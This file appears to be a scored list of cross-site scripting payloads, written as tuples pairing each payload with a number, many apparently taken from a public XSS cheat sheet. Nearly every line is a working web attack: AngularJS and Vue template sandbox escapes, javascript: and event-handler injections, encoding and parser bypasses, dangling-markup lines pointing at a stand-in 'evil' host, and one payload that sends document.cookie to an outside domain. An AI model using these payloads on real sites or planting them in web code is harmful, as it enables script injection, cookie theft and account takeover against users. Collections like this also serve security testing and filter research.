("{{constructor.constructor('alert(1)')()}}\n", -1.4)
("{{$on.constructor('alert(1)')()}}\n", -1.4)
("{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}\n", -1.4)
('{{{}.")));alert(1)//"}}\n', -1.4)
("{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}\n", -1.4)
('{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}\n', -1.4)
('{{{}.")));alert(1)//"}}\n', -1.4)
('{{{}.")));alert(1)//"}}\n', -1.4)
('{{!ready && (ready = true) && (\n', -0.4)
('!call\n', -0.4)
('? $$watchers[0].get(toString.constructor.prototype)\n', -0.4)
(': (a = apply) &&\n', -0.4)
('(apply = constructor) &&\n', -0.4)
('(valueOf = call) &&\n', -0.4)
("(''+''.toString(\n", -0.4)
("'F = Function.prototype;' +\n", -0.4)
("'F.apply = F.a;' +\n", -0.4)
("'delete F.a;' +\n", -0.4)
("'delete F.valueOf;' +\n", None)
("'alert(1);'\n", None)
(')));}}\n', -0.4)
("{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}\n", -2.4)
("{{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}\n", -2.4)
("{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}\n", -2.4)
("{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}\n", None)
("{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}\n", -2.4)
('{{\n', -0.4)
("c=''.sub.call;b=''.sub.bind;a=''.sub.apply;\n", -0.4)
('c.$apply=$apply;c.$eval=b;op=$root.$$phase;\n', -0.4)
('$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;\n', -0.4)
('C=c.$apply(c);$root.$$phase=op;$root.$digest=od;\n', -0.4)
('B=C(b,c,b);$evalAsync("\n', -0.4)
("astNode=pop();astNode.type='UnaryExpression';\n", -0.4)
("astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';\n", -1.4)
("astNode.argument={type:'Identifier',name:'foo'};\n", -0.4)
('");\n', -0.4)
('m1=B($$asyncQueue.pop().expression,null,$root);\n', -0.4)
("m2=B(C,null,m1);[].push.apply=m2;a=''.sub;\n", -0.4)
("$eval('a(b.c)');[].push.apply=a;\n", None)
('}}\n', -0.4)
('{{c=\'\'.sub.call;b=\'\'.sub.bind;c.$apply=$apply;c.$eval=b;$root.$$phase=null;$root.$digest=$on; C=c.$apply(c);B=C(b,c,b);$evalAsync("astNode=pop();astNode.type=\'UnaryExpression\';astNode.operator=\'alert(1)\';astNode.argument={type:\'Identifier\'};");m1=$$asyncQueue.pop().expression;m2=B(C,null,m1);[].push.apply=m2;$eval(\'B(b)\');}}\n', -2.4)
("{{constructor.constructor('alert(1)')()}}\n", -1.4)
("{{$on.constructor('alert(1)')()}}\n", -1.4)
("constructor.constructor('alert(1)')()\n", -1.4)
("a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()\n", -1.4)
('toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)\n', -1.4)
("{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()\n", None)
('{}.")));alert(1)//";\n', -1.4)
("'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';\n", -1.4)
("{y:''.constructor.prototype}.y.charAt=[].join;[1]|orderBy:'x=alert(1)'\n", -1.4)
("constructor.constructor('alert(1)')()\n", -1.4)
('toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)\n', -0.4)
('<input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'">\n', -0.4)
("<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(1)'>\n", -0.4)
('<input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'">\n', -0.4)
('<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == \'window\'">{{ [1].reduce(value.alert, 1); }}</div></div></div>\n', -0.4)
("<input ng-cut=$event.composedPath()|orderBy:'(y=alert)(1)'>\n", -0.8)
('<img src="javascript:alert(1)">\n', -2.4)
('<body background="javascript:alert(1)">\n', -2.4)
('<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">\n', -2.3)
('<a href="vbscript:MsgBox+1">XSS</a>\n', -0.6000000000000001)
('<a href="#" onclick="vbs:Msgbox+1">XSS</a>\n', -1.3)
('<a href="#" onclick="VBS:Msgbox+1">XSS</a>\n', -1.3)
('<a href="#" onclick="vbscript:Msgbox+1">XSS</a>\n', -1.3)
('<a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a>\n', -1.3)
('<a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>\n', -1.3)
('<a href="#" onclick="jscript.compact:alert(1);">test</a>\n', -2.4)
('<a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>\n', -2.3)
('<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>\n', -1.3)
('<a href=# onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>\n', -1.4)
('<iframe onload=VBScript.Encode:#@~^CAAAAA==\\ko$K6,FoQIAAA==^#~@>\n', -1.3)
('<iframe language=VBScript.Encode onload=#@~^CAAAAA==\\ko$K6,FoQIAAA==^#~@>\n', -1.5)
('<a title="&{alert(1)}">XSS</a>\n', -1.5)
('<link href="xss.js" rel=stylesheet type="text/javascript">\n', -0.30000000000000004)
('<form><button name=x formaction=x><b>stealme\n', -0.2)
('<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>\n', -1.6)
('<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">\n', -0.6000000000000001)
('<div style="\\-\\mo\\z-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">\n', -0.4)
('<div style="-moz-bindin\\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">\n', -0.4)
('<div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">\n', None)
('<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22 http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings%3E)" />\n', -0.4)
('<div style=xss:expression(alert(1))>\n', -1.4)
('<div style=xss:expression(1)-alert(1)>\n', -1.4)
('<div style=xss:expressio\\6e(alert(1))>\n', -1.4)
('<div style=xss:expressio\\006e(alert(1))>\n', -1.4)
('<div style=xss:expressio\\00006e(alert(1))>\n', -1.4)
('<div style=xss:expressio\\6e(alert(1))>\n', -1.4)
('<div style=xss:expressio&#x5c;6e(alert(1))>\n', -1.4)
('<div style=xss=expression(alert(1))>\n', -1.4)
('<div style="color&#x3dred">test</div>\n', -0.4)
('<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>\n', -2.4)
('<script>\n', -0.4)
('function window.onload(){\n', -0.5)
('alert(1);\n', -1.4)
('}\n', -0.4)
('</script>\n', -0.4)
('<script>\n', -0.2)
('function window::onload(){\n', -0.5)
('alert(1);\n', None)
('}\n', -0.4)
('</script>\n', -0.4)
('<script>\n', -0.2)
('function window.location(){\n', -0.5)
('}\n', -0.4)
('</script>\n', -0.4)
('<body>\n', -0.2)
('<script>\n', -0.2)
('function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){}\n', -2.5)
('</script>\n', -0.5)
('</body>\n', -0.2)
('<body>\n', -0.2)
('<script>\n', -0.2)
('function document.body.innerHTML(){ x = "<img src=1 onerror=alert(1)>"; }\n', -2.5)
('</script>\n', -0.5)
('</body>\n', -0.2)
('<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>\n', -2.2)
('<a href="javascript&\x00#x6a;avascript:alert(1)">Firefox</a>\n', -2.3)
('<a href="javascript&\x00colon\x00;alert(1)">Firefox</a>\n', -1.3)
('<!-\x00- ><img title="--><iframe/onload=alert(1)>"> -->\n', -2.3)
('<!-\x00\x00\x00\x00\x00- ><img title="--><iframe/onload=alert(1)>"> -->\n', -2.5)
('<svg><xss onload=alert(1)>\n', -2.5)
('<isindex type=image src="//evil?\n', -0.4)
('<isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?\n', -0.8)
('<isindex type=submit formaction=javascript:alert(1)>\n', -2.8)
('<isindex type=submit action=javascript:alert(1)>\n', -2.6)
('<svg><discard onbegin=alert(1)>\n', -2.6)
('<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>\n', -0.4)
('<img src=validimage.png onloadstart=alert(1)>\n', -2.4)
('<input type=image onloadend=alert(1) src=validimage.png>\n', -2.3)
('<noembed><img title="</noembed><img src onerror=alert(1)>"></noembed>\n', -2.4)
('<noscript><img title="</noscript><img src onerror=alert(1)>"></noscript>\n', None)
('<style><img title="</style><img src onerror=alert(1)>"></style>\n', -2.6)
('<script><img title="</script><img src onerror=alert(1)>"></script>\n', -3.4)
('<iframe><img title="</iframe><img src onerror=alert(1)>"></iframe>\n', -2.6)
('<xmp><img title="</xmp><img src onerror=alert(1)>"></xmp>\n', -2.5)
('<textarea><img title="</textarea><img src onerror=alert(1)>"></textarea>\n', None)
('<noframes><img title="</noframes><img src onerror=alert(1)>"></noframes>\n', -2.4)
('<title><img title="</title><img src onerror=alert(1)>"></title>\n', -2.6)
('<script>alert(document.domain)</script>\n', -2.6)
('<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>\n', -1.2)
('<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>\n', -2.6)
('<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>\n', -2.6)
('<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>\n', -2.6)
('<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>\n', -2.6)
('<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>\n', -2.6)
('<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>\n', None)
('<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>\n', -2.6)
('<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>\n', -2.6)
('<script>alert(document.domain)</script>\n', -3.6)
('<script>alert(document.domain)</script>\n', -3.6)
('<body background="//evil?\n', -0.2)
('<table background="//evil?\n', None)
('<table><thead background="//evil?\n', -0.7000000000000001)
('<table><tbody background="//evil?\n', -0.8)
('<table><tfoot background="//evil?\n', -0.8)
('<table><td background="//evil?\n', None)
('<table><th background="//evil?\n', -0.8)
('<link rel=stylesheet href="//evil?\n', -0.8)
('<link rel=icon href="//evil?\n', -0.4)
('<meta http-equiv="refresh" content="0; http://evil?\n', -1.4)
('<img src="//evil?\n', -0.30000000000000004)
('<image src="//evil?\n', -0.6000000000000001)
('<video><track default src="//evil?\n', -1.5)
('<video><source src="//evil?\n', -1.5)
('<audio><source src="//evil?\n', -0.6000000000000001)
('<input type=image src="//evil?\n', None)
('<form><button style="width:100%;height:100%" type=submit formaction="//evil?\n', -0.5)
('<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?\n', -0.8)
('<button form=x style="width:100%;height:100%;"><form id=x action="//evil?\n', -0.6000000000000001)
('<object data="//evil?\n', -1.0)
('<iframe src="//evil?\n', -0.6000000000000001)
('<embed src="//evil?\n', -0.6000000000000001)
('<form><button formaction=//evil>XSS</button><textarea name=x>\n', -0.5)
("<button form=x>XSS</button><form id=x action=//evil target='\n", -0.5)
('<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="\n', -0.6000000000000001)
('<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="\n', -0.6000000000000001)
('<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/\n', -0.5)
('<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="\n', -0.7000000000000001)
('<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="\n', -0.6000000000000001)
('<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="\n', -0.7000000000000001)
('<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="\n', -0.6000000000000001)
('<input type=hidden type=image src="//evil?\n', -0.7000000000000001)
('%C0%BCscript>alert(1)</script>\n', -1.6)
('%E0%80%BCscript>alert(1)</script>\n', -1.5)
('%F0%80%80%BCscript>alert(1)</script>\n', -1.5)
('%F8%80%80%80%BCscript>alert(1)</script>\n', -1.5)
('%FC%80%80%80%80%BCscript>alert(1)</script>\n', -1.5)
('<script>\\u0061lert(1)</script>\n', -1.5)
('<script>\\u{61}lert(1)</script>\n', -1.2)
('<script>\\u{0000000061}lert(1)</script>\n', -1.2)
("<script>eval('\\x61lert(1)')</script>\n", -2.2)
("<script>eval('\\141lert(1)')</script>\n", -2.2)
("<script>eval('alert(\\061)')</script>\n", -3.2)
("<script>eval('alert(\\61)')</script>\n", -3.2)
('<a href="&#106;avascript:alert(1)">XSS</a><a href="&#106avascript:alert(1)">XSS</a>\n', -2.2)
('<svg><script>&#97;lert(1)</script></svg>\n', -1.4)
('<svg><script>&#x61;lert(1)</script></svg>\n', -1.3)
('<svg><script>alert&NewLine;(1)</script></svg>\n', -1.3)
('<svg><script>x="&quot;,alert(1)//";</script></svg>\n', -2.3)
('<a href="&#0000106avascript:alert(1)">XSS</a>\n', -1.3)
('<a href="&#x6a;avascript:alert(1)">XSS</a>\n', -1.4)
('<a href="j&#x61vascript:alert(1)">XSS</a>\n', -1.3)
('<a href="&#x6a\n', -0.4)
('avascript:alert(1)">XSS</a>\n', -1.7000000000000002)
('<a href="&#x6a avascript:alert(1)">XSS</a>\n', -1.5)
('<a href="&#x0000006a;avascript:alert(1)">XSS</a>\n', None)
('<a href="&#X6A;avascript:alert(1)">XSS</a>\n', None)
('<a href="javascript&colon;alert(1)">XSS</a>\n', -1.3)
('<a href="java&Tab;script:alert(1)">XSS</a>\n', -1.3)
('<a href="java&NewLine;script:alert(1)">XSS</a>\n', -1.5)
('<a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>\n', -0.5)
('<a href="javascript:x=\'%27-alert(1)-%27\';">XSS</a>\n', -2.3)
('<a href="javascript:x=\'&percnt;27-alert(1)-%27\';">XSS</a>\n', -2.3)
('<input type="file" id="fileInput" /><script>const fileInput = document.getElementById(\'fileInput\');const dataTransfer = new DataTransfer();const file = new File([\'Hello world!\'], \'hello.txt\', {type: \'text/plain\'});dataTransfer.items.add(file);fileInput.files = dataTransfer.files</script>\n', -1.3)
('<xss class=progress-bar-animated onanimationstart=alert(1)>\n', -2.3)
('<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>\n', -3.3)
('<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>\n', -2.3)
('<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>\n', -1.2)
('<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>\n', -1.2)
('<iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;></iframe>\n', -0.2)
('<iframe src="javascript:\'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;\'"></iframe>\n', -1.3)
('<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>\n', -1.3)
('<img src=x onerror=location=atob`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`>\n', -1.3)
('javascript:/*--></title></style></textarea></script></xmp><svg/onload=\'+/"/+/onmouseover=1/+/[*/[]/+alert(1)//\'>\n', -4.4)
('javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \\"\n', -2.2)
(' onmouseover=/*&lt;svg/*/onload=alert()//>\n', -4.3)
('javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle=\'+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//\'>\n', -4.4)
('<iframe src="javascript:alert(1)">\n', -3.2)
('<object data="javascript:alert(1)">\n', None)
('<embed src="javascript:alert(1)">\n', None)
('<a href="javascript:alert(1)">XSS</a>\n', None)
('<a href="JaVaScript:alert(1)">XSS</a>\n', -2.3)
('<a href=" \tjavascript:alert(1)">XSS</a>\n', -2.3)
('<a href="javas\tcript:alert(1)">XSS</a>\n', -1.9)
('<a href="javascript\n', -0.6000000000000001)
(':alert(1)">XSS</a>\n', -1.6)
('<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>\n', -2.6)
('<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>\n', None)
('<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>\n', -2.5)
('<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>\n', -2.5)
('<script src="data:text/javascript,alert(1)"></script>\n', -2.5)
('<svg><script href="data:text/javascript,alert(1)" />\n', -1.2)
('<svg><use href="data:image/svg+xml,<svg id=\'x\' xmlns=\'http://www.w3.org/2000/svg\' xmlns:xlink=\'http://www.w3.org/1999/xlink\' width=\'100\' height=\'100\'><a xlink:href=\'javascript:alert(1)\'><rect x=\'0\' y=\'0\' width=\'100\' height=\'100\' /></a></svg>#x"></use></svg>\n', -2.5)
("<script>import('data:text/javascript,alert(1)')</script>\n", -2.3)
('<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>\n', -2.3)
('<math><x href="javascript:alert(1)">blah\n', -2.2)
('<form><button formaction=javascript:alert(1)>XSS\n', -2.4)
('<form><input type=submit formaction=javascript:alert(1) value=XSS>\n', -2.5)
('<form action=javascript:alert(1)><input type=submit value=XSS>\n', -2.4)
('<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>\n', -2.4)
('<a href="javascript://%0aalert(1)">XSS</a>\n', -2.5)
('<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoMSkiIC8+Cjwvc3ZnPg==#x" /></svg>\n', -0.30000000000000004)
('<svg><use href="data:image/svg+xml,&lt;svg id=\'x\' xmlns=\'http://www.w3.org/2000/svg\'&gt;&lt;image href=\'1\' onerror=\'alert(1)\' /&gt;&lt;/svg&gt;#x" />\n', -2.3)
('<svg><animate xlink:href="#x" attributeName="href" values="data:image/svg+xml,&lt;svg id=\'x\' xmlns=\'http://www.w3.org/2000/svg\'&gt;&lt;image href=\'1\' onerror=\'alert(1)\' /&gt;&lt;/svg&gt;#x" /><use id=x />\n', -2.4)
('<embed code=https://portswigger-labs.net width=500 height=500 type=text/html>\n', -0.4)
('<object width=500 height=500 type=text/html><param name=url value=https://portswigger-labs.net>\n', -0.4)
('<object width=500 height=500 type=text/html><param name=code value=https://portswigger-labs.net>\n', -0.4)
('<object width=500 height=500 type=text/html><param name=movie value=https://portswigger-labs.net>\n', -0.4)
('<object width=500 height=500 type=text/html><param name=src value=https://portswigger-labs.net>\n', None)
("<script>location.protocol='javascript'</script>\n", -1.4)
('<a href="%0aalert(1)" onclick="protocol=\'javascript\'">test</a>\n', -2.2)
("<script>navigation.navigate('javascript:alert(1)')</script>\n", -3.3)
('<script>alert(document.domain)</script>\n', None)
('<script>alert(document.domain)</script>\n', -2.2)
('<script>alert(document.domain)</script>\n', -2.2)
('<script>alert(document.domain)</script>\n', -2.2)
('<script>alert(document.domain)</script>\n', -2.2)
('<script>alert(document.domain)</script>\n', -2.2)
('<script>onerror=alert;throw 1</script>\n', -2.2)
('<script>{onerror=alert}throw 1</script>\n', -2.2)
('<script>throw onerror=alert,1</script>\n', -2.2)
("<script>throw onerror=eval,'=alert\\x281\\x29'</script>\n", -2.2)
("<script>throw onerror=eval,'alert\\x281\\x29'</script>\n", -2.2)
("<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\\x281\\x29'}</script>\n", -2.2)
("<script>throw onerror=eval,e=new Error,e.message='alert\\x281\\x29',e</script>\n", -2.2)
("<script>throw onerror=Uncaught=eval,e=new Error,e.message='/*'+location.hash,!!window.InstallTrigger?e:e.message</script>\n", -2.2)
('<script>throw{},onerror=Uncaught=eval,h=location.hash,e={lineNumber:1,columnNumber:1,fileName:0,message:h[2]+h[1]+h},!!window.InstallTrigger?e:e.message</script>\n', -2.2)
('<script>throw/x/,onerror=Uncaught=eval,h=location.hash,e=Error,e.lineNumber=e.columnNumber=e.fileName=e.message=h[2]+h[1]+h,!!window.InstallTrigger?e:e.message</script>\n', -2.2)
("<script>'alert\\x281\\x29'instanceof{[Symbol.hasInstance]:eval}</script>\n", -1.2)
("<script>'alert\\x281\\x29'instanceof{[Symbol['hasInstance']]:eval}</script>\n", -1.2)
("<script>location='javascript:alert\\x281\\x29'</script>\n", -2.2)
('<script>location=name</script>\n', -1.2)
('<script>alert`1`</script>\n', -1.2)
('<script>new Function`X${document.location.hash.substr`1`}`</script>\n', -1.2)
('<script>Function`X${document.location.hash.substr`1`}```</script>\n', -1.2)
('<video><source onerror=location=/\\02.rs/+document.cookie>\n', -1.2)
('<svg onload=alert(1) \n', -2.4)
('<svg onload=alert(1)<!--\n', -2.5)
('<script>throw[onerror]=[alert],1</script>\n', -2.5)
('<script>var{a:onerror}={a:alert};throw 1</script>\n', -1.2)
('<script>var{haha:onerror=alert}=0;throw 1</script>\n', -2.2)
("<script>window.name='javascript:alert(1)';</script><svg onload=location=name>\n", -4.2)
('<meta http-equiv="refresh" content="0; url=//portswigger-labs.net">\n', -1.4)
('<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-\n', -1.2)
('<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-\n', -2.4)
('+/v8\n', -0.4)
('+ADw-script+AD4-alert(1)+ADw-/script+AD4-\n', -1.4)
('+/v9\n', -0.4)
('+ADw-script+AD4-alert(1)+ADw-/script+AD4-\n', -1.4)
('+/v+\n', -0.4)
('+ADw-script+AD4-alert(1)+ADw-/script+AD4-\n', -1.4)
('+/v/\n', -0.4)
('+ADw-script+AD4-alert(1)+ADw-/script+AD4-\n', -1.4)
('<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">\n', -1.4)
('<iframe sandbox src="//portswigger-labs.net"></iframe>\n', -0.2)
('<meta name="referrer" content="no-referrer">\n', -1.3)
('<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>\n', -2.2)
('<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>\n', -2.3)
('<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>\n', -2.3)
('<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)\n', -2.3)
('<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)\n', -2.3)
('<a href=# download="filename.html">Test</a>\n', -0.30000000000000004)
('<img referrerpolicy="no-referrer" src="//portswigger-labs.net">\n', None)
('<a href=# onclick="window.open(\'http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//\',\'alert(1)\')">XSS</a>\n', -4.5)
('<iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></iframe>\n', -3.4)
('<base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>\n', -3.4)
('<a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>\n', -3.4)
('<img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>\n', None)
('<form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x value="\';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>\n', -2.6)
('<form><input type=hidden name=x value="\';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>\n', -2.3)
('<form><input type=hidden name=x value="\';eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>\n', -2.3)
("{{constructor.constructor('alert(1)')()}}\n", -1.3)
('<div v-html="\'\'.constructor.constructor(\'alert(1)\')()">a</div>\n', -1.4)
("<x v-html=_c.constructor('alert(1)')()>\n", -1.4)
("<x v-if=_c.constructor('alert(1)')()>\n", -1.4)
("{{_c.constructor('alert(1)')()}}\n", -2.3)
("{{_v.constructor('alert(1)')()}}\n", -1.4)
("{{_s.constructor('alert(1)')()}}\n", -1.4)
('<p v-show="_c.constructor`alert(1)`()">\n', -1.4)
("<x v-on:click='_b.constructor`alert(1)`()'>click</x>\n", -1.4)
("<x v-bind:a='_b.constructor`alert(1)`()'>\n", -2.6)
('<x @[_b.constructor`alert(1)`()]>\n', -2.3)
('<x :[_b.constructor`alert(1)`()]>\n', -2.4)
('<p v-=_c.constructor`alert(1)`()>\n', None)
('<x #[_c.constructor`alert(1)`()]>\n', -1.4)
('<p :=_c.constructor`alert(1)`()>\n', -2.4)
("{{_c.constructor('alert(1)')()}}\n", -2.4)
('{{_b.constructor`alert(1)`()}}\n', -1.5)
('<x v-bind:is="\'script\'" src="//14.rs" />\n', -0.4)
('<x is=script src=//⑭.₨>\n', -0.4)
("<x @click='_b.constructor`alert(1)`()'>click</x>\n", None)
('<x @[_b.constructor`alert(1)`()]>\n', -2.7)
('<x :[_b.constructor`alert(1)`()]>\n', -2.4)
('<x #[_c.constructor`alert(1)`()]>\n', -2.4)
('<x title"="&lt;iframe&Tab;onload&Tab;=alert(1)&gt;">\n', -2.4)
('<x title"="&lt;iframe&Tab;onload&Tab;=setTimeout(/alert(1)/.source)&gt;">\n', -2.4)
('<xyz<img/src onerror=alert(1)>>\n', -3.4)
('<svg><svg><b><noscript>&lt;/noscript&gt;&lt;iframe&Tab;onload=setTimeout(/alert(1)/.source)&gt;</noscript></b></svg>\n', -3.6)
('<a @[\'c\\lic\\u{6b}\']="_c.constructor(\'alert(1)\')()">test</a>\n', -1.4)
('{{$el.ownerDocument.defaultView.alert(1)}}\n', -1.4)
("{{$el.innerHTML='\\u003cimg src onerror=alert(1)\\u003e'}}\n", -2.4)
